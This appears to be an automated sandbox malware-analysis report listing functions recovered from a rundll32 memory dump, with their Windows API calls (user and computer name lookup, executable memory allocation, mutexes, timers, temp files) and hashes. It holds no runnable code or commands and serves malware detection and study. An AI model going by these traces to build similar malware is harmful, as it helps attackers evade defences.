                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0593507A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              • Opcode ID: 05bb673a18708bf110a2fd8842c4c7e4f7bb107621f7156f2db6f9334bc8e445
                              • Instruction ID: 23f228ff9533168922ba8023f24b29e526000c5f32f790740d94f9f99c6ea04b
                              • Opcode Fuzzy Hash: 05bb673a18708bf110a2fd8842c4c7e4f7bb107621f7156f2db6f9334bc8e445
                              • Instruction Fuzzy Hash: 5C41D930115345DFCF348F68D98ABAA7BEDFB09314F0A852AE44ECB210C7319955CB86
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594596C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 05945A17
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05945A84
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 05945A8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              • Opcode ID: 8b1c0235dd9f4e6a2fc8c9d2e80567ceedb87cf63a56fd55146e936f58421dc7
                              • Instruction ID: a2ea9728ca6be13b7e15ec125a7ef1bfb02d361a5c2e3c17ee3e010ca15e4c90
                              • Opcode Fuzzy Hash: 8b1c0235dd9f4e6a2fc8c9d2e80567ceedb87cf63a56fd55146e936f58421dc7
                              • Instruction Fuzzy Hash: 43417C70A007099FDB24DFA8C984ABEBBF5FF44614F55892DD48693681E334AD48CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D0E3 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,0593DE40,00000000,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D121
                              • lstrlen.KERNEL32(0593DE40,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D13F
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0593D1AE
                              • lstrlen.KERNEL32(0593DE40,00000000,00000000,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D1CF
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0593D1E3
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0593D1EC
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0593D1FA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              • Opcode ID: 7d2da70adc501e269286536e06f66cfb9884e06afa19b2974eef0bb644ec3bc6
                              • Instruction ID: caecba13dab2f5fdd82a68e5f086f15a786ce93c0d9c99b55085f67f5ad02766
                              • Opcode Fuzzy Hash: 7d2da70adc501e269286536e06f66cfb9884e06afa19b2974eef0bb644ec3bc6
                              • Instruction Fuzzy Hash: 7941E57690421AEBDF11DF64DD8689B7FA9FF042A0B054125FC09A7211E731EE609BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05932009 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05932028,?), ref: 0593867A
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05932028,?), ref: 05938697
                              • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 05932055
                              • lstrlenW.KERNEL32(00000008,?,?,?), ref: 0593205C
                              • lstrlenW.KERNEL32(?,?,?,?,?), ref: 0593207A
                              • lstrlen.KERNEL32(00000000,?,00000000), ref: 05932138
                              • lstrlenW.KERNEL32(?), ref: 05932143
                              • wsprintfA.USER32 ref: 05932185
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                              • String ID:
                              • API String ID: 1727939831-0
                              • Opcode ID: ae313659ad1e600f707367aa6898082c6d4a2d47e91f8ef1668133ca60ab5578
                              • Instruction ID: d57df3b1bfc0dab57d153063a63b86a27afc00ef5a1ab8aa3d606bca8c0ea7f7
                              • Opcode Fuzzy Hash: ae313659ad1e600f707367aa6898082c6d4a2d47e91f8ef1668133ca60ab5578
                              • Instruction Fuzzy Hash: 9D512F75A0020AEFCF01EFA8DD49DAE7BBAFF84214B054165F914A7210DB35EE219F50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05937DF5 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000), ref: 05937E46
                              • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05937ED9
                              • GetLastError.KERNEL32(?,?,0000011F), ref: 05937F31
                              • GetLastError.KERNEL32 ref: 05937F63
                              • GetLastError.KERNEL32 ref: 05937F77
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000,?,05933EC6,?), ref: 05937F8C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$memcpy
                              • String ID:
                              • API String ID: 2760375183-0
                              • Opcode ID: ded1c747baf677e04138819d636b833b9446b692fc906cb2218349e5ae302702
                              • Instruction ID: 716366fdd02db59825b107123b8c9a6ef7aa7a5ead5cf007171b4dd39106011b
                              • Opcode Fuzzy Hash: ded1c747baf677e04138819d636b833b9446b692fc906cb2218349e5ae302702
                              • Instruction Fuzzy Hash: 205138B1914209FFEB10DFA8DC8AAAEBBBDFB44350F108429F915E6240D7709E55CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594ADF7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(?,00000020), ref: 0594AEF4
                              • lstrcat.KERNEL32(?,00000020), ref: 0594AF09
                              • lstrcmp.KERNEL32(00000000,?), ref: 0594AF20
                              • lstrlen.KERNEL32(?), ref: 0594AF44
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: 689e6b2750fe25dc5218b31e000b88b6422d65e9a01e025b321337791c024049
                              • Instruction ID: f8ba70263ee869d3a06980bad275d48375d72e86b7fa8a360f10bc8a9ab4b204
                              • Opcode Fuzzy Hash: 689e6b2750fe25dc5218b31e000b88b6422d65e9a01e025b321337791c024049
                              • Instruction Fuzzy Hash: FE516C71A44209EFDB21CF99C485AAEBBBBFF55314F05C49AE8259B201C770AE51CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D581 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5A3
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5B4
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5C6
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5D8
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5EA
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5F6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 4c2fb9695a9b93a55a9303e6f50994e7e2ce29e08e750b6c8ec299baaf6563b6
                              • Instruction ID: 249bc32f7b10d29e7a6541f08b6b4c20a3581a5bb21bed4cb1ceb5f4e6437820
                              • Opcode Fuzzy Hash: 4c2fb9695a9b93a55a9303e6f50994e7e2ce29e08e750b6c8ec299baaf6563b6
                              • Instruction Fuzzy Hash: 92412171E0070AEFCF10DF99C895A6EB7FAFF98248B148929E556E3204D774E9048B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945C28 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059424C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 059424CF
                                • Part of subcall function 059424C3: SetLastError.KERNEL32(000000B7,?,05945C3C,?,?,00000000,?,?,?), ref: 059424E0
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05945C5C
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D34
                                • Part of subcall function 0593A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                                • Part of subcall function 0593A976: CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                                • Part of subcall function 0593A976: GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 0593A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                                • Part of subcall function 0593A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                                • Part of subcall function 0593A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05945D1D
                              • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D26
                                • Part of subcall function 059424C3: CreateMutexA.KERNEL32(0595A1E8,00000000,?,?,05945C3C,?,?,00000000,?,?,?), ref: 059424F3
                              • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 05945D41
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                              • String ID:
                              • API String ID: 1700416623-0
                              • Opcode ID: 4749f8f104b667a266362b0eedf3525eb98f95ed3a70780d5af27ac623d3f459
                              • Instruction ID: e8e985b2e34eec0ccfeb1ec218f1740bfdafc6813a6d56e5ef7170a08a90d093
                              • Opcode Fuzzy Hash: 4749f8f104b667a266362b0eedf3525eb98f95ed3a70780d5af27ac623d3f459
                              • Instruction Fuzzy Hash: 51315275614304AFC711AFB4D849D6ABFA9FF89310B264525F916DB250EB359C10CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C20F Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0594C228
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,059389E4,00000000), ref: 0594C26A
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0594C2BC
                              • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,059389E4,00000000), ref: 0594C2D5
                                • Part of subcall function 0593E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0593EA0D
                                • Part of subcall function 0593E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0594C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0593EA50
                              • GetLastError.KERNEL32(?,00000000,059389E4,00000000,?,?,?,?,?,?,?,05939100,?), ref: 0594C30D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                              • String ID:
                              • API String ID: 1921436656-0
                              • Opcode ID: 582e2ba0358a4137eb61be452bcb57bef8583db92343945b8760d805c035b5ec
                              • Instruction ID: d03740836b400edab890f21b19e878edfe27ff6fe62c8f2d6c8785846cb71c50
                              • Opcode Fuzzy Hash: 582e2ba0358a4137eb61be452bcb57bef8583db92343945b8760d805c035b5ec
                              • Instruction Fuzzy Hash: 6731E271A15209EFDF11DFA5D885EAEBBB9EB48650F010066F905A7240EB70AE54CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05939FF6 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0593A078
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593A091
                              • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0593A09E
                              • lstrlen.KERNEL32(0595B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0593A0B0
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0593A0E1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                              • String ID:
                              • API String ID: 2734445380-0
                              • Opcode ID: d9a4d559f422bd29e2206b2b29175d514293d6d4951dceb068fcf7c66844d039
                              • Instruction ID: ff096e8a8c97f24edbd3aba7d5a3ba9947caa5b90bab58494899c7fad38555fd
                              • Opcode Fuzzy Hash: d9a4d559f422bd29e2206b2b29175d514293d6d4951dceb068fcf7c66844d039
                              • Instruction Fuzzy Hash: E1316D71500209FFCB11CFA5DC8AEEE7FB9FF45220F104164F91992200EB35A965DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593DD77 Relevance: 7.6, APIs: 5, Instructions: 91memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05933DA2,00000000,00000001,?,?,?), ref: 0593DD92
                              • lstrlen.KERNEL32(?), ref: 0593DDA2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DDD6
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0593DE01
                              • memcpy.NTDLL(00000000,?,?), ref: 0593DE20
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593DE81
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0593DEA3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID:
                              • API String ID: 3204852930-0
                              • Opcode ID: 3205eb25cc2b726aee6814ddfb911ccbe2ba82686b97e8f30d9d13e42068e018
                              • Instruction ID: 4caff6eac0d3c234c45773fee130e6baa4bee9a85984e8967e46b625b1d144bf
                              • Opcode Fuzzy Hash: 3205eb25cc2b726aee6814ddfb911ccbe2ba82686b97e8f30d9d13e42068e018
                              • Instruction Fuzzy Hash: B03119B290420AEFCF11DFA4CC859AE7FB9FF58284F044469E915A7211E731DA648FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05941ECD Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05941F04
                              • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941F15
                              • lstrcmpi.KERNEL32(00000002,?), ref: 05941F5B
                              • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941F6F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941FB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 5dfcc3518b36be6bdc59a507e8e02d4e70ed1a660f483c4e5e10c5247163d8b3
                              • Instruction ID: d36b0b31c31e0bfdf2633eefd16fac9d3da0c4e05b63a5876612b89842104300
                              • Opcode Fuzzy Hash: 5dfcc3518b36be6bdc59a507e8e02d4e70ed1a660f483c4e5e10c5247163d8b3
                              • Instruction Fuzzy Hash: 9E31CE32A10309AFCB109FA8DC89EAEBFB9FB44254F100169F90597200EB359DA5DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593242A Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0593243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0594D58C
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 05932454
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 05932467
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05932478
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 059324E3
                              • InterlockedIncrement.KERNEL32(0595A43C), ref: 059324FA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: bd352b3ebfa755d6c4dc7ad51f6ff4a06f41ed09245a47ea9407dec84999e165
                              • Instruction ID: b4557227704fa0287b9589609bf8277c9b68ef9ef19fa4a7a36951e86675dc4b
                              • Opcode Fuzzy Hash: bd352b3ebfa755d6c4dc7ad51f6ff4a06f41ed09245a47ea9407dec84999e165
                              • Instruction Fuzzy Hash: E0318D35608301DFCB22CF68D84A92ABBF9FB84326B015A19F85683210DB30E921CBD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059386AD Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0593E23D,00000000,76CDF5B0,05940348,?,00000001), ref: 059386CD
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059386E2
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059386FE
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05938713
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05938727
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: 1e383c1dc5b0ad785ff841cb626e4e2f119a1f8a78307105072b5ff0e38c9522
                              • Instruction ID: 218323f02e3c31b53e268e6e60afee644318e453caba1730869316e43a102873
                              • Opcode Fuzzy Hash: 1e383c1dc5b0ad785ff841cb626e4e2f119a1f8a78307105072b5ff0e38c9522
                              • Instruction Fuzzy Hash: 05316B72628311DFD701CF68E582E55BBEAFB49321B854216F60AD7300DB78E822CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05948327 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 0594833B
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 05948357
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 05948391
                              • GetComputerNameW.KERNEL32(?,?), ref: 059483B4
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 059483D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: f8e62bd87c7dabebb994a4ac5c8a324586d92610eccf789ea4605c935e17752e
                              • Instruction ID: 2bb7a0c5d6648d605c6766540a333e275867b8e21e81ee6fcfcd998548bacb4f
                              • Opcode Fuzzy Hash: f8e62bd87c7dabebb994a4ac5c8a324586d92610eccf789ea4605c935e17752e
                              • Instruction Fuzzy Hash: 2021D876904209FFDB11DFE8C989DAEBBBCEF44240B5144AAE502E7240DA30AF44DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593306D Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05933090
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 05933099
                              • GetLastError.KERNEL32 ref: 059330A3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05933162
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: efefca33ba9d7b63d1601729b801f9b3659c37ffd01ed37b297e34513506f12d
                              • Instruction ID: 73bf9bbe491ab7a9d95c753558ea4ed9752d0a0c645dfccf7375dd9ced4f73f0
                              • Opcode Fuzzy Hash: efefca33ba9d7b63d1601729b801f9b3659c37ffd01ed37b297e34513506f12d
                              • Instruction Fuzzy Hash: 8F211072625310ABCA10ABF5ED4DE567BACDF8A211B050511B719CB241DB24F9248FE8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05942F4E Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05941C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05941C25
                                • Part of subcall function 05941C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05941C3B
                                • Part of subcall function 05941C19: _snwprintf.NTDLL ref: 05941C60
                                • Part of subcall function 05941C19: CreateFileMappingW.KERNEL32(000000FF,0595A1E8,00000004,00000000,00001000,?), ref: 05941C7C
                                • Part of subcall function 05941C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941C8E
                                • Part of subcall function 05941C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05941CC6
                              • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05942F89
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05942F92
                              • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05942FD9
                              • GetLastError.KERNEL32(05943959,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05943008
                              • CloseHandle.KERNEL32(00000000,05943959,00000000,00000000,?,?,?,?,?,?,?,05939100,?), ref: 05943018
